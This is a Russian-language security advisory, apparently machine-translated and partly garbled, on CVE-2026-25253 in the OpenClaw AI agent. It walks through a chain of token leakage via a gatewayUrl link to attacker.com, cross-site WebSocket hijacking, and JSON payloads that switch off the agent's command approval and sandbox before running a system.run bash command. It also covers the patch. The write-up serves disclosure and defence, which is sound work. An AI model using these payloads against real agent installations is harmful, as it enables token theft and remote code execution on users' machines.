1. Введение в OpenClaw
OpenClaw (ранее известный как Clawdbot, Moltbot) - автономная система с открытым исходным кодом.ИИПроект персонального помощника, впервые представленный в ноябре 2025 года. Его цель - предоставить пользователям самодостаточный, локально работающий ИИ-агент, который глубоко интегрирует возможности крупномасштабных языковых моделей (LLM) с привилегиями реальных системных операций. В отличие от SaaS-ассистентов, которые хранят данные пользователя в облаке, OpenClaw развертывается на собственном устройстве пользователя (например, ноутбуке, домашнем сервере или VPS), что обеспечивает конфиденциальность и контроль над данными. .
Проект быстро завоевал популярность среди разработчиков благодаря своим мощным возможностям и открытой архитектуре, а его репозиторий на GitHub за короткое время набрал более 149 000 звездочек. OpenClaw способен интегрироваться с широким спектром приложений для обмена мгновенными сообщениями, такими как iMessage, WhatsApp, Slack и т. д., и получает повышенные системные привилегии, такие как чтение и запись файлов и выполнение команд командной строки, чтобы для выполнения сложных задач, поставленных пользователем Однако такая конструкция привилегий “режима бога” также создает почву для серьезных уязвимостей в системе безопасности. Однако такой дизайн привилегий "режима бога" также создает почву для серьезных уязвимостей в системе безопасности.
2. Принцип уязвимости OpenClaw
CVE-2026-25253Уязвимость, получившая в CVSS 3.1 оценку 8.8 (высокий риск), коренится в цепочке логических ошибок, включающих раскрытие токенов, перехват межсайтовых WebSocket и выход из песочницы. Вся атака может быть запущена без участия пользователя путем нажатия на ссылку.
2.1 Основная цепочка уязвимостей
Уязвимость состоит из трех ключевых звеньев, соединенных в тандем, как показано в таблице ниже:
|
кольцевое кольцо |
Документация/модули |
Описание дефекта |
|
утечка токенов |
app-settings.ts |
Интерфейс управления слепо доверяет и сохраняет параметры запроса URL вgatewayUrl. |
app-lifecycle.ts |
существоватьgatewayUrlСразу после установки автоматически запускается подключение к новому шлюзу. |
|
gateway.ts |
При создании WebSocket-соединения он автоматически устанавливает высокую привилегиюauthTokenдоставитьgatewayUrl. |
|
|
Межсайтовый захват веб-сокетов (Cross-site WebSocket Hijacking, CSWSH) |
Сервер WebSocket |
На запрос о подключении не было получено ответа.Происхождениезаголовок для аутентификации, позволяя подключаться из произвольных источников. |
|
побег из песочницы |
API |
Злоумышленник может использовать украденныеоператор.администраториоператор.допускиразрешения, а также отключать механизмы защиты безопасности с помощью вызовов API. |
Во-первых, когда пользователь нажимает на файл, содержащий вредоносныйgatewayUrlСсылка на параметр (например. http://victim_openclaw.com?gatewayUrl=ws://attacker.com:8080 ), внешнее приложение OpenClaw сохраняет адрес сервера злоумышленника в качестве нового адреса шлюза без аутентификации. Затем приложение немедленно пытается установить WebSocket-соединение с этим новым адресом и прикрепляет к запросу на соединение локально сохраненный аутентифицированный адресauthToken. Злоумышленник, прослушивающий его сервер, может легко перехватить этот токен. .
Во-вторых, поскольку браузеры не применяют политику одинакового происхождения (SOP) для WebSocket-соединений, а WebSocket-сервер OpenClaw не может проверить подлинность соединения.Происхождениезаголовка запроса, что приводит к возможности межсайтового перехвата WebSocket. Это означает, что злоумышленник может использовать JavaScript на своем вредоносном сайте, чтобы позволить браузеру жертвы действовать как “трамплин” к веб-серверу, работающему наlocalhostСоединение WebSocket инициируется экземпляром OpenClaw на .
Наконец, используя украденный токен повышенных привилегий, злоумышленник может отключить встроенные механизмы безопасности OpenClaw через вызовы API. Эти механизмы изначально использовались для защиты от вредоносного поведения в модели искусственного интеллекта, например, Prompt Injection, включая запрос подтверждения пользователя перед выполнением опасных команд и выполнение кода в контейнерной песочнице. Злоумышленники могут легко отключить эти средства защиты, чтобы получить возможность выполнять произвольные команды непосредственно на хосте. .
Рис. 1: Архитектура OpenClaw и путь к уязвимости CVE-2026-25253
Рисунок 2: Цепочка использования РЦЭ одним кликом OpenClaw
3. OpenClaw POC/EXP
Согласно данным, раскрытым исследователем безопасности Мавом Левином (Mav Levin), полная цепочка эксплойтов атаки ”one-click RCE” может быть завершена в течение миллисекунд после того, как жертва посетит вредоносную веб-страницу.
Рисунок 3: Поток атак OpenClaw CVE-2026-25253
3.1 Поток атак
1.вызвать щелчок: Жертву побуждают посетить контролируемую злоумышленником веб-страницу (например. attacker.com)。
2.кража жетонов: JavaScript страницы открывает в фоновом режиме URL, указывающий на экземпляр OpenClaw жертвы, и сопровождающий его URL, указывающий на сервер злоумышленника.gatewayUrlпараметр, который будетauthTokenотправляется злоумышленнику.
3.Локальное подключение и привилегии: Другой фрагмент JavaScript на странице эксплуатирует уязвимость CSWSH, используя украденный токен для подключения к локальной службе OpenClaw WebSocket жертвы (которая по умолчанию использует ws://localhost:18789)。
4.Отключить защиту: Атакующие скрипты отправляют API-запросы, отключают подтверждение пользователя и режим "песочницы".
Отключить подтвержденные пользователем полезные нагрузки:
{“метод”: “exec.approvals.set”,“параметры”: { “по умолчанию”: { “безопасность”: “полный”, “спросить”: “выключено” } }}
Отключите "песочницу" для полезной нагрузки: черезconfig.patchпросить, чтобыtools.exec.hostустановленный нашлюз.
5.Выполните любой код: Наконец, сценарий атаки посылаетnode.invokeзапрос, вызываяsystem.runкоманда для выполнения произвольного кода на хосте жертвы.
Пример полезной нагрузки RCE:
{“тип”: “req”,“id”: “4”,“метод”: “node.invoke”,“параметры”: {“nodeId”: “главный”,“команда”: “system.run”,“параметры”: {“cmd”: “bash -c ‘echo hacked > /tmp/hacked'” } }}
Рисунок 4: Механизм перехвата межсайтовых веб-сокетов (CSWSH) в деталях
4. программа устранения уязвимостей
Команда OpenClaw быстро отреагировала и выпустила исправление! 2026.1.29. Основные исправления заключаются в разрыве цепочки дефектных автоподключений и повышении безопасности взаимодействия с пользователем.
“Патч добавляет модальное окно подтверждения URL-адреса шлюза, устраняя поведение автоматического подключения без запроса”.”
Конкретные исправления включают:
Добавьте диалоговые окна подтвержденияКогдаgatewayUrlЕсли параметр используется для изменения адреса шлюза, появится диалоговое окно подтверждения, в котором пользователю будет предложено подтвердить изменение вручную.
Удалить автоматическое подключение: Полностью удалено поведение автоматического подключения к новому шлюзу без явного разрешения пользователя.
Официальные лица рекомендуют всем пользователям немедленно перейти на v2026.1.29 или выше. Кроме того, если пользователи подозревают, что их токен аутентификации мог быть скомпрометирован, они должны немедленно повернуть .
5. Ссылка
[1] CSO. Руководство по укреплению безопасности приложения Clawdbot Enterprise Intelligent Body.” 2026-01-31.
[2] Левин, Мав. “1-Click RCE для кражи данных и ключей Moltbot (CVE-2026-25253)”. depthfirst. 2026-02-01.
[3] Национальная база данных уязвимостей. “CVE-2026-25253”.”
[4] GitHub. “Неправильная передача ресурсов между сферами в openclaw/openclaw.” ghsa-g8p2-7wf7-98mq.
Оригинальная статья написана Chief Security Officer, при воспроизведении просьба указывать: https://www.cncso.com/ru/openclaw-one-click-remote-code-execution.html.
